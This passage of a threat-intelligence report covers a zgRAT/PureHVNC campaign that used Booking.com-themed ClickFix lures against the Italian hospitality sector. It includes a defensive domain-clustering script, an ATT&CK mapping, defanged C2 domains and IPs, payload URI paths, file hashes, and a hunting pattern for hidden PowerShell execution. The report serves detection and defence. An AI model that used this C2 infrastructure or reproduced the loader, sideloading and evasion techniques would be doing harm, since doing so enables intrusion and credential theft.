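# list calls out, the shared Cloudflare NS pair and the AS208885 prefixes. DNS records are
# constructed; the NS names, IPs and prefixes are those published in the report.
import ipaddress
from collections import defaultdict
from typing import Dict, FrozenSet, List, Tuple

BPH_PREFIXES = [ipaddress.ip_network(p) for p in ("86.54.24.0/24", "95.85.244.0/24")]
CAMPAIGN_NS = frozenset({"johnny.ns.cloudflare.com", "princess.ns.cloudflare.com"})

# Constructed passive-DNS style records: domain -> (name servers, resolved IP or "" when
# only the Cloudflare edge is visible). newlure-example.net is a hypothetical new domain.
RECORDS: Dict[str, Tuple[List[str], str]] = {
    "asmweosiqsaaw.com":     (["johnny.ns.cloudflare.com", "princess.ns.cloudflare.com"], "95.85.244.166"),
    "seomorry.com":          (["princess.ns.cloudflare.com", "johnny.ns.cloudflare.com"], ""),
    "buqiwptshpqisy.com":    (["johnny.ns.cloudflare.com", "princess.ns.cloudflare.com"], ""),
    "hailmeinc.com":         (["ns1.hosting-placeholder.example", "ns2.hosting-placeholder.example"], "162.241.123.127"),
    "newlure-example.net":   (["johnny.ns.cloudflare.com", "princess.ns.cloudflare.com"], ""),
    "unrelated-example.org": (["ns1.other-placeholder.example", "ns2.other-placeholder.example"], "203.0.113.5"),
}

def cluster_by_ns(records: Dict[str, Tuple[List[str], str]]) -> Dict[FrozenSet[str], List[str]]:
    """Group domains by their (order-independent, case-insensitive) name-server set."""
    clusters: Dict[FrozenSet[str], List[str]] = defaultdict(list)
    for domain, (nameservers, _) in records.items():
        key = frozenset(ns.lower().rstrip(".") for ns in nameservers)
        clusters[key].append(domain)
    return {k: sorted(v) for k, v in clusters.items()}

def domains_sharing_ns(records, ns_pair: FrozenSet[str] = CAMPAIGN_NS) -> List[str]:
    """Every domain delegated to exactly the given NS pair: the shared-account pivot."""
    return cluster_by_ns(records).get(frozenset(ns_pair), [])

def in_bph_prefix(ip: str) -> bool:
    """True when the address falls inside one of the AS208885 prefixes."""
    if not ip:
        return False
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BPH_PREFIXES)

def bph_hosted(records) -> List[str]:
    """Domains whose resolved address sits in the bulletproof-hosting prefixes."""
    return sorted(d for d, (_, ip) in records.items() if in_bph_prefix(ip))

if __name__ == "__main__":
    print("same Cloudflare account:", domains_sharing_ns(RECORDS))
    print("hosted in AS208885 prefixes:", bph_hosted(RECORDS))
```

Cloudflare assigns the same two name servers to every zone in one account, so the NS-set key is a strong account-level link; the prefix check catches domains that are not proxied and point straight at the rented /24s.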

Three Waves, One Operator

The campaign has operated in three distinct waves over three months:

Date                 Wave     Samples                                 Delivery            Notes
2025-12-04           Wave 1   msedge_elf.dll (4.4MB) + PS1 loaders    Italian spam        First observed, DLL masquerading as Edge
2025-12-09           Wave 2   msedge_elf.dll (9.2MB) + .NET EXE       Italian spam        Updated loaders, .NET variant added
2026-03-03 to 03-07  Wave 3   Go DLL + .NET crypter + ClickFix ZIP    ClickFix phishing   New delivery via fake Booking.com pages

The evolution from Wave 1 to Wave 3 shows increasing sophistication: the operator moved from simple DLL masquerading (naming their payload msedge_elf.dll) to a full DLL sideloading package with a legitimate binary and cover libraries. They added the Go-compiled loader alongside the .NET variant. And they shifted from direct email delivery to ClickFix social engineering, which has a higher success rate against modern email security.

Threat Actor Assessment

Attribute        Assessment
Confidence       MEDIUM
Region           Eastern Europe / CIS
Motivation       Financial -- credential theft, remote access
Sophistication   Professional -- multi-stage loader, dual architecture, stolen cert, BPH
Targeting        Hospitality sector, Italian-speaking regions

The evidence points consistently toward a CIS-based financially motivated group: Italian-language targeting (a common Eastern European cybercrime focus), Vietnamese and Chinese registrars (standard CIS OPSEC for domain privacy), Russian hosting ecosystem connections, PureHVNC (popular in Russian-speaking underground forums), and Booking.com-themed lures (a well-established Eastern European social engineering template).

This is not a nation-state operation. The targeting is opportunistic, the infrastructure is rented rather than owned, and the payload is a commodity RAT. But the execution -- dual loader architectures, stolen sub-CA certificates, bulletproof hosting on freshly minted ASNs -- puts this a tier above the typical "spray and pray" stealer crew.

MITRE ATT&CK Mapping

Tactic            Technique                                          ID          Implementation
Initial Access    Phishing: Spearphishing Link                       T1566.002   Booking.com themed Italian spam
Execution         User Execution: Malicious Link                     T1204.001   ClickFix/FakeCaptcha pages
Execution         Command and Scripting Interpreter: PowerShell      T1059.001   Multi-stage PS1 loaders (ads.ps1 + full loader)
Execution         Signed Binary Proxy Execution: DLL Side-Loading    T1574.002   psl.exe loads trojanized libpsl-5.dll
Persistence       Boot or Logon Autostart: Registry Run Keys         T1547.001   HKCU...\CurrentVersion\Run
Defense Evasion   Obfuscated Files: Software Packing                 T1027.002   .NET Reactor + Eazfuscator dual-layer
Defense Evasion   Subvert Trust Controls: Code Signing               T1553.002   Stolen *.dodo.com sub-CA certificate
Defense Evasion   Virtualization/Sandbox Evasion                     T1497       Benign API calls (catfact.ninja, httpbin.org) for timing
Defense Evasion   Masquerading: Match Legitimate Name                T1036.005   msedge_elf.dll, libpsl-5.dll
Discovery         System Information Discovery                       T1082       PS1 fingerprinting (OS, model, AV products)
Discovery         System Owner/User Discovery                        T1033       Username, admin status collection
Collection        Screen Capture                                     T1113       PureHVNC remote desktop
C2                Application Layer Protocol: Web                    T1071.001   HTTPS to asmweosiqsaaw[.]com
C2                Web Service                                        T1102       Cloudflare-proxied C2
Exfiltration      Exfiltration Over C2 Channel                       T1041       Via zgRAT C2 protocol

Indicators of Compromise

Network Indicators

# C2 Domains
asmweosiqsaaw[.]com          -- Primary C2
seomorry[.]com                -- Victim telemetry/tracking
buqiwptshpqisy[.]com         -- Stage 0 PS1 hosting
empowerhouseproject[.]org    -- Payload ZIP hosting
hailmeinc[.]com              -- ClickFix phishing pages (14 subdomains)
wiosyrondaty[.]com           -- PS1 delivery (wave 3)

# C2 IPs
95[.]85[.]244[.]166          -- AS208885, primary C2
162[.]241[.]123[.]127        -- HostGator India, phishing
208[.]109[.]21[.]36          -- GoDaddy, payload hosting
85[.]208[.]84[.]110          -- Online Connect Ltd UK, staging

# C2 URI Paths
/tituqs?id=&s=               -- Telemetry beacon (seomorry[.]com)
/jsyqi20458aq                -- PS1 download (buqiwptshpqisy[.]com)
/wiuyajsohiyq.zip            -- Payload download (empowerhouseproject[.]org)

# ASN
AS208885 (NFS-AS) -- 86.54.24.0/24, 95.85.244.0/24

# Cloudflare NS Pair (shared account pivot)
johnny[.]ns[.]cloudflare[.]com + princess[.]ns[.]cloudflare[.]com

File Indicators

# Go DLL (signed, wave 3)
SHA-256: 137326ac5fc9563532826dccf4442886bef1ec94a41654b9cbb6c963d78a35d2
imphash: 0951d9f67c9a9e1b6ea746ed01bccc26

# .NET Reactor Crypter (wave 3)
SHA-256: a8d214b32d8d0074b8dd8682852a66e9b4dd8566ea2e5255085858bc64034f44
imphash: f34d5f2d4577ed6d9ceec516c1f5a744

# msedge_elf.dll (wave 1)
SHA-256: 0b1ecb1d5505123ee64955f4cca064997b0139a31a8bf199097c7ab3d61d6a91

# msedge_elf.dll (wave 2)
SHA-256: d0c5a9d05ef2c84d44d026a4e6081fa19522c27773b4c263f657cb6015d30fe3

# .NET EXE (wave 2)
SHA-256: 625c148f7eacb68305880c51c7b7c217862ac253a6a804941c9d9224dd4e13e2

# ClickFix ZIP package
SHA-256: 6f4273c7f5d3c19365f05e95399140916d83e1d300b9ae652e93a3e6a043b509

# Trojanized libpsl-5.dll
SHA-256: 26f7c34675ba7a4e68a8fedf7b1ec903ff55b07ac0344d8ba8c689510a965bfd

# Legitimate psl.exe (sideloader)
SHA-256: 96db67104f1f0eb37e33097fa679c9e42f606be0455b55a7af4319e345c66124

# PowerShell loaders
SHA-256: fec2ca2210d1f07ddec3372dd51562f26ad27a2723b8e88d40f5a864b487e624  (stage 1)
SHA-256: a91e84a616f495f5497d113b718f419713ed1581d445daeb61b5297ef4a05fb3  (ads.ps1)

Behavioral Indicators

# Registry persistence
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\p8gx4zwgxrd9m_csq_oTK66*

# Installation directories
%LOCALAPPDATA%\uhwy97krbc_n5_upd_q8leg*\
%APPDATA%\uhwy97krbc_n5_upd_q8leg*\

# Downloaded ZIP
%TEMP%\z1lezbfux10e5l2_ptf6N2.zip

# Tracking UUID (hardcoded in all PS1 variants)
b15f31a4-487b-4b46-b59d-98ac0c873c61

# Code signing certificate
Serial: 60F33E3BFC90BB4181EE461E
Subject: CN=*.dodo.com
Issuer: CN=GlobalSign RSA OV SSL CA 2018

# .NET metadata
Assembly: Zftgbtgff
GUID: 6dd43ad4-a079-4909-92ad-9d6d4cfb14ad
Go module: arlington/

Immediate (24-48 hours)

  • Block all listed C2 domains and IPs at the network perimeter
  • Search EDR/SIEM for PowerShell execution with -WindowStyle Hidden -ExecutionPolicy Bypass downloading from the listed staging domains
  • Hunt for HKCU\...\Run keys matching the p8gx4zwgxrd9m pattern
  • Block the stolen *.dodo.com certificate by serial 60F33E3BFC90BB4181EE461E in code signing trust policies
  • Alert hospitality sector ISACs about the Booking.com-themed campaign

Short-term (1-2 weeks)

  • Deploy YARA rules targeting zgRAT .NET Reactor patterns and the arlington/ Go module name
  • Monitor the Cloudflare NS pair (johnny + princess) for new domains appearing under the same account
  • Block AS208885 (NFS-AS) at the organizational level if risk tolerance permits -- the entire /24 ranges are BPH infrastructure
  • Scan for psl.exe + libpsl-5.dll co-occurrence as a DLL sideloading indicator
  • Hunt for benign API beacon patterns (catfact.ninja, httpbin.org, adviceslip.com) in close temporal proximity to PowerShell execution

Medium-term (1-3 months)

  • Report the stolen *.dodo.com certificate to GlobalSign for revocation
  • Submit abuse reports to Mat Bao (Vietnam) for asmweosiqsaaw[.]com, HostGator India for hailmeinc[.]com phishing, and RIPE NCC for AS208885 BPH activity
  • Report AS208885 to upstream transit providers IST-AS (Lithuania) and IPTransit (UK) for bulletproof hosting
  • Monitor Certificate Transparency logs for new certificates on asmweosiqsaaw[.]com and related domains
  • Track zanemint-mnt RIPE maintainer for new ASN registrations -- the next shell identity will likely use the same broker

Published by Breakglass Intelligence. Investigation conducted 2026-03-10. 12+ samples analyzed. 7 domains mapped. 14 phishing subdomains identified. 512 IPs across 2 ASN prefixes attributed to bulletproof hosting. Classification: TLP:CLEAR